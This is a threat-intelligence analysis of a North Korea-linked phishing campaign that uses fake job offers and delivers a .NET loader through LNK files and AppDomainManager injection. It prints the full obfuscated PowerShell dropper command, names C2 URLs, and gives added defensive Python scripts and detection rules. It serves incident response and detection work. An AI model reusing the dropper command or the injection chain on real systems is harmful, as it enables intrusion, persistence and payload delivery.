
Squid Werewolf cyber spies masquerade as recruiters
Espionage activity clusters may pose as recruiters to distribute phishing emails, targeting key employees in organizations of interest. In December 2024, the BI.ZONE Threat Intelligence team uncovered a peculiar phishing campaign aimed at luring victims with fake job opportunities at an industrial organization. A detailed analysis revealed that the attack had been carried out by Squid Werewolf (APT37, Ricochet Chollima, ScarCruft, Reaper Group).
- Targeted phishing emails with relevant subject lines enable attackers to promptly access data within the systems used by key personnel.
- Threat actors are increasingly shifting away from Microsoft Word documents and Microsoft Excel spreadsheets, instead focusing on archives containing executables, scripts, or shortcuts.
- Espionage clusters are opting for more sophisticated methods and tools. Therefore, using advanced threat detection solutions such as EDR is recommended to mitigate the risks.
The attack would begin with a phishing email, which the adversaries disguised as a job offer from a United Industrial Complex HR representative.

The attachment comprised a password‑protected file Предложение о работе.zip, with the password provided in the email. The ZIP archive included an LNK file Предложение о работе.pdf.lnk which, once opened, executed the following command:
powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';if(Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk'){$k=New-Object IO.FileStream ($env:temp+'\'+((Get-ChildItem $env:temp -recurse 'Предложение о работе.pdf.lnk').Directory).Name+'\'+'Предложение о работе.pdf.lnk'),'Open','Read','ReadWrite'}else{$k=New-Object IO.FileStream 'Предложение о работе.pdf.lnk','Open','Read','ReadWrite'};$b=New-Object byte[](692604);$k.Seek(3001,[IO.SeekOrigin]::Begin);$k.Read($b,0,692604);$a=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64CharArray($b,0,$b.Length)) -split ':';copy 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe' ($t+'\d.exe');[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]));[IO.File]::<# mm #>WriteAllBytes($t+'\DomainManager.dll',[Convert]::FromBase64""String($a[1]));[IO.File]::<# mm #>WriteAllBytes($env:temp+'\mngs Attachement.pdf',[Convert]::FromBase64""String($a[2]));explorer ($env:temp+'\mngs Attachement.pdf');start ($t+'\d.exe')
This command triggered the following sequence:
- Open the file Предложение о работе.pdf.lnk, read the Base64‑encoded data starting at offset 3001, and decode it. The resulting data is then split by the : character, and each part is decoded again as Base64.
- Copy the file %WINDOWS%\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe to gain persistence in the system.
- Save the decoded data to the following files:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\d.exe.config
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll
%TEMP%\mngs Attachement.pdf
- Open the phishing document mngs Attachement.pdf.
- Run the d.exe executable.

Figure: Предложение о работе.pdf.lnk

Figure: mngs Attachement.pdf
The d.exe file (a renamed copy of dfsvc.exe) is used to load DomainManager.dll.
The d.exe file is a .NET application. When a user runs a .NET application, the Common Language Runtime (CLR) automatically loads and analyzes its configuration file (in this case, d.exe.config).
The d.exe.config file contents are described below.

The <runtime> section of the configuration file specifies the .NET CLR runtime settings used to load a custom AppDomainManager. <appDomainManagerType value="DomainManager.InjectedDomainManager" /> indicates the class to be used as the AppDomainManager: DomainManager.InjectedDomainManager means that the class InjectedDomainManager will be loaded by the CLR from the namespace DomainManager. <appDomainManagerAssembly value="DomainManager" /> indicates the assembly (DLL) from which the AppDomainManager is loaded. In our case, this is a DLL file located in the same directory as the d.exe executable.
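To hunt for this AppDomainManager injection pattern across a fleet, the following Python script (an added example, not BI.ZONE's code or tooling) parses a .exe.config and reports when its <runtime> section names a custom AppDomainManager. The sample configuration is constructed from the two elements quoted above; the surrounding <configuration>/<runtime> skeleton is the standard .NET layout and is assumed here, as is the .exe.config path used for the sample.

```python
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

# Constructed sample: the two elements quoted in the write-up, placed in the
# standard <configuration>/<runtime> skeleton (the skeleton itself is assumed).
SAMPLE_CONFIG = """<configuration>
  <runtime>
    <appDomainManagerType value="DomainManager.InjectedDomainManager" />
    <appDomainManagerAssembly value="DomainManager" />
  </runtime>
</configuration>
"""

# Constructed benign config: no custom AppDomainManager declared.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
</configuration>
"""

# Assumed on-disk path of the dropped config (matches the drop location above).
SAMPLE_PATH = (r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\d.exe.config")


def appdomainmanager_settings(config_xml: str) -> dict:
    """Return the AppDomainManager elements declared under <runtime>, if any."""
    runtime = ET.fromstring(config_xml).find("runtime")
    if runtime is None:
        return {}
    found = {}
    for tag in ("appDomainManagerType", "appDomainManagerAssembly"):
        elem = runtime.find(tag)
        if elem is not None and elem.get("value"):
            found[tag] = elem.get("value")
    return found


def assess_config(config_path: str, config_xml: str) -> dict:
    """Flag a config that redirects the CLR to a custom AppDomainManager."""
    verdict = {"config": config_path, "suspicious": False, "reasons": []}
    settings = appdomainmanager_settings(config_xml)
    if not settings:
        return verdict
    verdict["suspicious"] = True
    verdict["reasons"].append(
        "custom AppDomainManager: " + ", ".join(f"{k}={v}" for k, v in settings.items()))
    asm = settings.get("appDomainManagerAssembly", "")
    if asm and "PublicKeyToken" not in asm:
        # A simple assembly name carries no strong-name identity, so the CLR
        # probes it from the application base: a DLL sitting next to the EXE.
        exe_dir = PureWindowsPath(config_path).parent
        verdict["reasons"].append(f"sideloaded assembly expected at {exe_dir}\\{asm}.dll")
    return verdict


if __name__ == "__main__":
    for path, xml in ((SAMPLE_PATH, SAMPLE_CONFIG), (r"C:\app\app.exe.config", BENIGN_CONFIG)):
        print(assess_config(path, xml))
```

The assembly check relies on how the CLR resolves a simple (non-strong) assembly name: it is probed from the application base directory, so DomainManager resolves to DomainManager.dll beside d.exe, which is exactly the sideloading this campaign depends on. A config declaring appDomainManagerAssembly next to an executable that was copied out of a system directory is worth an alert on its own.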
DomainManager.dll is a C#-based loader that is obfuscated, likely using Obfuscar. The loader strings are stored in a byte array that is double XOR-encrypted: each byte is XORed with its index in the array and with the key 0xAA.
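The string table can be recovered with a few lines of Python. The decoder below is an added example (not the loader's code): it assumes the double XOR is applied byte by byte with the byte's index and the constant 0xAA, and that strings are NUL-terminated and addressed by their start index. The sample blob is constructed inside the block from strings the write-up mentions.

```python
KEY = 0xAA  # constant key named in the write-up


def xor_transform(data: bytes) -> bytes:
    """Assumed scheme: each byte XORed with its array index (low byte) and with KEY.
    XOR is its own inverse, so the same function encrypts and decrypts."""
    return bytes(b ^ (i & 0xFF) ^ KEY for i, b in enumerate(data))


def build_table(strings) -> bytes:
    """Construct a sample encrypted string table (NUL-terminated UTF-8 strings)."""
    plain = b"".join(s.encode("utf-8") + b"\x00" for s in strings)
    return xor_transform(plain)


def string_at(blob: bytes, index: int) -> str:
    """Recover the string that starts at `index`, the way the loader looks one up."""
    plain = xor_transform(blob)
    end = plain.index(b"\x00", index)
    return plain[index:end].decode("utf-8")


def dump_strings(blob: bytes):
    """Recover every (offset, string) pair for a full listing during triage."""
    plain = xor_transform(blob)
    result, pos = [], 0
    for chunk in plain.split(b"\x00"):
        if chunk:
            result.append((pos, chunk.decode("utf-8", "replace")))
        pos += len(chunk) + 1
    return result


if __name__ == "__main__":
    # Constructed sample built from strings the write-up mentions.
    table = build_table(["seconds", "DomainManager.conf"])
    print(table.hex())
    for offset, text in dump_strings(table):
        print(f"{offset:4d}: {text}")
```

Because the index enters the XOR, identical characters at different positions encrypt to different bytes, which is why a plain single-key XOR brute force does not recover the table; the offsets printed by dump_strings are the values you would expect to see passed to the loader's string lookup.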

The entry point is in the method InitializeNewDomain of the class InjectedDomainManager.
A code example is available below

The loader can perform the following operations:
- Check internet connectivity by calling https://www.timeapi[.]io/api/time/current/zone?timeZone=Europe%2FAmsterdam. If the server response includes the “seconds” string, access is confirmed; otherwise, the Internet is unavailable.
- Check a program’s runtime to impede sandbox execution. To do this, the loader captures the current timestamp, sleeps for 10 minutes, then updates the timestamp and calculates the time difference. If it exceeds nine minutes, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/discountcode.php and then terminates.
- If all checks are successfully passed, the loader disables autoruns from the startup folder by setting the following registry key parameters:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder]
dll = 0x3
exe.config = 0x3
- Check for the presence of %LOCALAPPDATA%\DomainManager.conf. If this file exists, the loader reads the malicious payload encrypted using AES128 CBC, decrypts it, and executes it in memory. If %LOCALAPPDATA%\DomainManager.conf does not exist, the loader sends a GET request to hxxps://hwsrv-1253398.hostwindsdns[.]com/307c77ab-f41f-4dd4-a478-2a71b9625f64/c/shoppingcart.php. The server response is decrypted using AES128 CBC. It encompasses a malicious payload, which the loader runs in memory. The server payload is saved to the file %LOCALAPPDATA%\DomainManager.conf encrypted with AES128 CBC. The payload was unavailable at the time of the research.
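A defender checking a host for the registry tampering described above wants to know which startup-folder entries have been flagged as disabled. The following Python snippet is an added example (neither the loader's code nor BI.ZONE tooling): it parses a .reg export of the StartupApproved\StartupFolder key and reports each item's state, using the value layout Windows uses for this key (first byte 0x02 = enabled, 0x03 = disabled). The export text is constructed; its value names mirror the files the LNK command drops and one benign entry.

```python
import re

TARGET_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
              r"\Explorer\StartupApproved\StartupFolder")

# Constructed .reg export (Windows Registry Editor format); value names and
# bytes are made up for the example, one entry enabled and two disabled.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder]
"OneDrive.lnk"=hex:02,00,00,00,00,00,00,00,00,00,00,00
"DomainManager.dll"=hex:03,00,00,00,d2,5a,7c,1f,8a,9b,db,01
"d.exe.config"=hex:03,00,00,00,\
  d2,5a,7c,1f,8a,9b,db,01
'''


def parse_reg_binary_values(reg_text: str, key_path: str) -> dict:
    """Return {value_name: bytes} for the REG_BINARY values under key_path,
    honouring the backslash line continuations used by .reg exports."""
    values, in_key = {}, False
    pending_name, pending_hex = None, ""
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_key = line[1:-1].lower() == key_path.lower()
            continue
        if not in_key or not line:
            continue
        if pending_name is None:
            m = re.match(r'"(.+?)"=hex:(.*)$', line)
            if not m:
                continue  # not a REG_BINARY value
            pending_name, pending_hex = m.group(1), m.group(2)
        else:
            pending_hex += line
        if pending_hex.endswith("\\"):
            pending_hex = pending_hex[:-1]
            continue  # value continues on the next line
        values[pending_name] = bytes.fromhex(pending_hex.replace(",", ""))
        pending_name, pending_hex = None, ""
    return values


def startup_folder_state(reg_text: str) -> dict:
    """Map each startup-folder item to 'enabled', 'disabled' or 'unknown'."""
    states = {}
    for name, blob in parse_reg_binary_values(reg_text, TARGET_KEY).items():
        flag = blob[0] if blob else None
        states[name] = {2: "enabled", 3: "disabled"}.get(flag, "unknown")
    return states


def disabled_items(reg_text: str) -> list:
    """Names of items marked disabled: the ones a loader like this one hides."""
    return sorted(n for n, s in startup_folder_state(reg_text).items() if s == "disabled")


if __name__ == "__main__":
    for name, state in startup_folder_state(SAMPLE_REG).items():
        print(f"{state:8s} {name}")
```

Run against a real export (reg export of the key above), the disabled list is the set of startup-folder files that will not appear as active in Task Manager's Startup tab; a non-executable such as a .dll or .exe.config being present in the Startup folder at all, disabled or not, is the stronger signal.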
The attack detected by BI.ZONE Threat Intelligence closely resembles one described by the Securonix team, who attribute it to the APT37 cluster (dubbed Squid Werewolf by BI.ZONE).
The adversaries employed a similar C#-based library in the past. At the time, however, the payload was decrypted using a Caesar (shift) cipher and contained obfuscated JavaScript code. The payload comprised another loader that sent a victim’s computer name to the server, then loaded and executed a PowerShell script, incorporating the VeilShell remote access trojan.
Indicators of compromise:
20dd93441c5e78b7adc7764c92719bed70ddb0676f707df7ea9f37d7969f4776
49a2ed08930ed20cbf859ca2fe3113e64f7a305c7a03cbda284fcceb781d053b
0601426a6da40ec9b47bab54e4ec149ba69ee58f787eea0e32d1001cab1abd04
hwsrv-1253398.hostwindsdns[.]com
Tactic | Technique | Procedure |
---|---|---|
Initial Access | Phishing: Spearphishing Attachment | Squid Werewolf uses phishing email attachments to distribute malware |
Execution | Command and Scripting Interpreter: PowerShell | Squid Werewolf uses a malicious LNK file to execute the PowerShell command |
Execution | User Execution: Malicious File | The victim must execute the malicious LNK file to initiate the system compromise |
Persistence | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Squid Werewolf employs the malicious LNK file to create files in the Startup folder |
Defense Evasion | Deobfuscate/Decode Files or Information | Squid Werewolf uses a PowerShell script to decode a Base64-encoded payload from the malicious LNK, comprising three files: d.exe.config, DomainManager.dll, and mngs Attachement.pdf. Squid Werewolf uses a .NET loader to decrypt the payload file DomainManager.conf. Squid Werewolf uses a .NET loader to decrypt double XOR-encrypted strings |
Defense Evasion | Hijack Execution Flow: AppDomainManager | Squid Werewolf employs AppDomainManager injection to run the .NET loader |
Defense Evasion | Masquerading: Rename System Utilities | Squid Werewolf uses the malicious LNK file to copy and rename the .NET‑associated process dfsvc.exe to d.exe |
Defense Evasion | Masquerading: Double File Extension | Squid Werewolf uses the double extension .pdf.lnk |
Defense Evasion | Modify Registry | Squid Werewolf employs the .NET loader to modify the parameters of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder |
Defense Evasion | Obfuscated Files or Information | Squid Werewolf uses Obfuscar to obfuscate the .NET loader. Squid Werewolf uses double XOR to encrypt strings in the .NET loader |
Defense Evasion | Obfuscated Files or Information: Embedded Payloads | Squid Werewolf employs the malicious LNK file with a Base64-encoded payload comprising three files: d.exe.config, DomainManager.dll, and mngs Attachement.pdf |
Defense Evasion | Obfuscated Files or Information: Command Obfuscation | Squid Werewolf uses an obfuscated PowerShell command in the malicious LNK file |
Defense Evasion | Obfuscated Files or Information: Encrypted/Encoded File | Squid Werewolf employs the payload file DomainManager.conf encrypted with AES128 CBC |
Defense Evasion | Virtualization/Sandbox Evasion: Time Based Evasion | Squid Werewolf leverages a 10-minute delay in the .NET payload to check a program’s runtime |
Discovery | System Network Configuration Discovery: Internet Connection Discovery | Squid Werewolf uses the timeapi[.]io service to check internet connectivity |
Command and Control | Application Layer Protocol: Web Protocols | Squid Werewolf uses HTTPS to load the encrypted payload file |
Command and Control | Ingress Tool Transfer | Squid Werewolf employs a .NET loader to download the malicious payload from the server |
The described malicious activity can be detected using the following rules from BI.ZONE EDR:
win_suspicious_powershell_base64
win_renamed_dfsvc_process
win_th_create_file_in_startup_folder_via_command_interpreter
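The three rule names above map onto the process-creation and file-creation telemetry any EDR or Sysmon deployment already collects. The Python below is an added example (not BI.ZONE's rule logic; the rule names are reused only as labels) that approximates each rule over constructed event records modelled on the LNK command described earlier: it normalizes the obfuscated PowerShell (inline <# #> comments, empty-string insertions such as FromBase64""String) before matching, flags a process whose PE OriginalFileName is dfsvc.exe but whose image name differs, and flags files written to the Startup folder by a command interpreter. The field names follow Sysmon conventions, and the OriginalFileName value of dfsvc.exe is assumed.

```python
import re
import ntpath

COMMAND_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"  # lower-cased fragment of the per-user Startup path

# Constructed Sysmon-style events (field names assumed). The PowerShell command
# line is a shortened version of the one carried by the LNK described above.
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": r"""powershell.exe -nop -c $t=$env:appdata+'\Microsoft\Windows\Start Menu\Programs\Startup';[IO.File]::<# mm #>WriteAllBytes($t+'\d.exe.config',[Convert]::FromBase64""String($a[0]))"""},
    {"event": "file_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DomainManager.dll"},
    {"event": "process_create",
     "image": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d.exe",
     "original_file_name": "dfsvc.exe",
     "command_line": "d.exe"},
    {"event": "process_create",  # benign: ordinary PowerShell use
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "original_file_name": "PowerShell.EXE",
     "command_line": "powershell.exe -Command Get-Process"},
    {"event": "process_create",  # benign: dfsvc.exe running under its own name
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe",
     "original_file_name": "dfsvc.exe",
     "command_line": "dfsvc.exe"},
]


def normalize_powershell(cmd: str) -> str:
    """Undo two cheap obfuscations seen in the LNK command before matching."""
    cmd = re.sub(r"<#.*?#>", "", cmd, flags=re.S)  # drop inline block comments
    cmd = cmd.replace('""', "")                     # FromBase64""String -> FromBase64String
    return cmd.lower()


def rule_suspicious_powershell_base64(ev: dict) -> bool:
    if ev.get("event") != "process_create":
        return False
    if ntpath.basename(ev.get("image", "")).lower() not in {"powershell.exe", "pwsh.exe"}:
        return False
    cmd = normalize_powershell(ev.get("command_line", ""))
    return "frombase64" in cmd and ("-nop" in cmd or "programs\\startup" in cmd)


def rule_renamed_dfsvc_process(ev: dict) -> bool:
    if ev.get("event") != "process_create":
        return False
    return (ev.get("original_file_name", "").lower() == "dfsvc.exe"
            and ntpath.basename(ev.get("image", "")).lower() != "dfsvc.exe")


def rule_startup_file_via_interpreter(ev: dict) -> bool:
    if ev.get("event") != "file_create":
        return False
    creator = ntpath.basename(ev.get("image", "")).lower()
    return creator in COMMAND_INTERPRETERS and STARTUP_DIR in ev.get("target", "").lower()


RULES = {
    "win_suspicious_powershell_base64": rule_suspicious_powershell_base64,
    "win_renamed_dfsvc_process": rule_renamed_dfsvc_process,
    "win_th_create_file_in_startup_folder_via_command_interpreter": rule_startup_file_via_interpreter,
}


def evaluate(events):
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The normalization step is the part worth copying: matching on the literal token FromBase64String would miss this campaign's command, while matching on the decoded form catches both the plain and the broken-up spelling. The renamed-binary rule needs the PE OriginalFileName field, which Sysmon event 1 and most EDR sensors populate, and it generalizes to any system utility copied under a new name.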
Like many other clusters, Squid Werewolf employs phishing emails to infiltrate a victim’s infrastructure. These risks can be mitigated with email protection solutions like BI.ZONE CESP. The service features a high-performance engine of our own design and incorporates various methods of email traffic analysis.
Building an effective cybersecurity strategy requires an understanding of adversaries’ methods and tools while staying alert to the latest threats. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools, as well as data from underground resources. This intelligence helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.